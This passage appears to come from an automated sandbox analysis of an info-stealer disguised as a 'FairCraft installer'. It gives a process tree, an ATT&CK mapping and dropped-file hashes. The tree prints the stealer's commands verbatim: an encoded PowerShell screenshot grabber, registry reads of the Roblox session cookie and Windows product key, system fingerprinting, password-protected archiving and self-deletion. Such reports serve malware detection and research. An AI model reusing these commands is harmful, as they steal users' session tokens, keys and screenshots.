      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:5068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2588
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\afeniqdg\afeniqdg.cmdline"
        5⤵
        
        PID:5096
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD9E5.tmp" "c:\Users\Admin\AppData\Local\Temp\afeniqdg\CSCE12546A5188D4B54AA6D8AB0EA8B9757.TMP"
        6⤵
        
        PID:2524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4752
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3980
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1284
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3196
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1496
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1560
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:896
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1704
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3928
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1612
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI36762\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\W6Wxa.zip" *"
    3⤵
    PID:928
  - - C:\Users\Admin\AppData\Local\Temp\_MEI36762\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI36762\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\W6Wxa.zip" *
      4⤵
      Executes dropped EXE
      PID:4644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1652
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:2200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1104
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3672
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\FairCraft installer.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3116
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1988

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:224

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\b722f7e297ff4119a82ce6fa21221188 /t 4908 /p 1672
1⤵
PID:1020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c5f08d24862e6379a8d1690a00cec9d9

SHA1
bb8d97ecabf50dbb00c4cdb8e597abb8e8d4cc6a

SHA256
5e251646e29c7e8add8d15ded067b00678c73cc35186cf029605353f964c1c11

SHA512
1d45907c632096953a267f3dbcd3edca01fcaec966cc88d39b6fd6b45e3684710cc23fbe53d649d0f2866ad4de36437795ae66b7440b7c079f83725aeed9c34a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
af094edfd4f794af10298d0ef5a2ffd0

SHA1
bec7ed17e1948b0bf719895e4346492ed9769355

SHA256
2f24bc296d0211d79c18beaa2b0100d32c703d1c98aa5612bbd384b5dca303c5

SHA512
6a029004ab4b57a86a473712a90714d0189c4e9ebc945ac8817b3aa0110b58ed62e3ff8a01113f62f30df192429169906ac7861d9c98f77f8a4c44a0e7242ba8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD9E5.tmp

Filesize
1KB

MD5
c963a85a380c08ced0b054bafd862ffc

SHA1
39c32ac543175317bb51367d119d3bbdac3a2a98

SHA256
ff4674684ceb38281ccd8598b9335efd224c8a287aa2ec65dbe592d6ba1dfdd9

SHA512
3fa5a59483292f51763b072102708f7555bad9d3d0d47d9d8fa5cf81a23f47907a9718d139b4717ed530bebd84ffc2d6d1e1a37053170aef1d2fc41b7c23db46

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36762\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36762\_bz2.pyd

Filesize
48KB

MD5
1d9398c54c80c0ef2f00a67fc7c9a401

SHA1
858880173905e571c81a4a62a398923483f98e70

SHA256
89006952bee2b38d1b5c54cc055d8868d06c43e94cd9d9e0d00a716c5f3856fa

SHA512
806300d5820206e8f80639ccb1fba685aafa66a9528416102aeb28421e77784939285a88a67fad01b818f817a91382145322f993d855211f10e7ba3f5563a596

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36762\_ctypes.pyd

Filesize
59KB

MD5
2401460a376c597edce907f31ec67fbc

SHA1
7f723e755cb9bfeac79e3b49215dd41fdb5c2d90

SHA256
4f3f99b69834c43dac5c3f309cb0bd56c07e8c2ac555de4923fa2ddc27801960

SHA512
9e77d666c6b74cfb6287775333456cce43feb51ec39ad869c3350b1308e01ad9b9c476c8fa6251fe8ad4ab1175994902a4ad670493b95eb52adb3d4606c0b633

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36762\_decimal.pyd

Filesize
107KB

MD5
df361ea0c714b1a9d8cf9fcf6a907065

SHA1
102115ec2e550a8a8cad5949530cca9993250c76

SHA256
f78ee4524eb6e9885b9cbdb125b2f335864f51e9c36dc18fdccb5050926adffe

SHA512
b1259df9167f89f8df82bda1a21a26ee7eb4824b97791e7bbaa3e57b50ae60676762fd598c8576d4e6330ffaf12972a31db2f17b244c5301dcf29fe4abfba43f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36762\_hashlib.pyd

Filesize
35KB

MD5
d4c05f1c17ac3eb482b3d86399c9baae

SHA1
81b9a3dd8a5078c7696c90fbd4cf7e3762f479a5

SHA256
86bd72b13a47693e605a0de1112c9998d12e737644e7a101ac396d402e25cf2f

SHA512
f81379d81361365c63d45d56534c042d32ee52cad2c25607794fe90057dcdeeb2b3c1ff1d2162f9c1bdf72871f4da56e7c942b1c1ad829c89bf532fb3b04242e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36762\_lzma.pyd

Filesize
86KB

MD5
e0fa126b354b796f9735e07e306573e1

SHA1
18901ce5f9a1f6b158f27c4a3e31e183aa83251b

SHA256
e0dc01233b16318cd21ca13570b8fdf4808657ec7d0cc3e7656b09ccf563dc3e

SHA512
dd38100889c55bffc6c4b882658ecd68a79257bc1ffd10f0f46e13e79bff3fc0f908ae885cc4a5fed035bd399860b923c90ef75e203b076b14069bf87610f138

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36762\_queue.pyd

Filesize
26KB

MD5
84aa87c6dd11a474be70149614976b89

SHA1
c31f98ec19fc36713d1d7d077ad4176db351f370

SHA256
6066df940d183cf218a5053100e474d1f96be0a4e4ee7c09b31ea303ff56e21b

SHA512
11b9f8e39c14c17788cc8f1fddd458d70b5f9ef50a3bdb0966548ddcb077ff1bf8ca338b02e45ec0b2e97a5edbe39481dd0e734119bc1708def559a0508adc42

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36762\_socket.pyd

Filesize
44KB

MD5
1d982f4d97ee5e5d4d89fe94b7841a43

SHA1
7f92fe214183a5c2a8979154ece86aad3c8120c6

SHA256
368cf569adc4b8d2c981274f22181fea6e7ce4fa09b3a5d883b0ff0ba825049d

SHA512
9ecdcf9b3e8dc7999d2fa8b3e3189f4b59ae3a088c4b92eaa79385ed412f3379ebe2f30245a95d158051dbd708a5c9941c150b9c3b480be7e1c2bba6dea5cb24

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI36762\_sqlite3.pyd

Filesize
57KB

MD5
3911ae916c6e4bf99fe3296c3e5828ca

SHA1
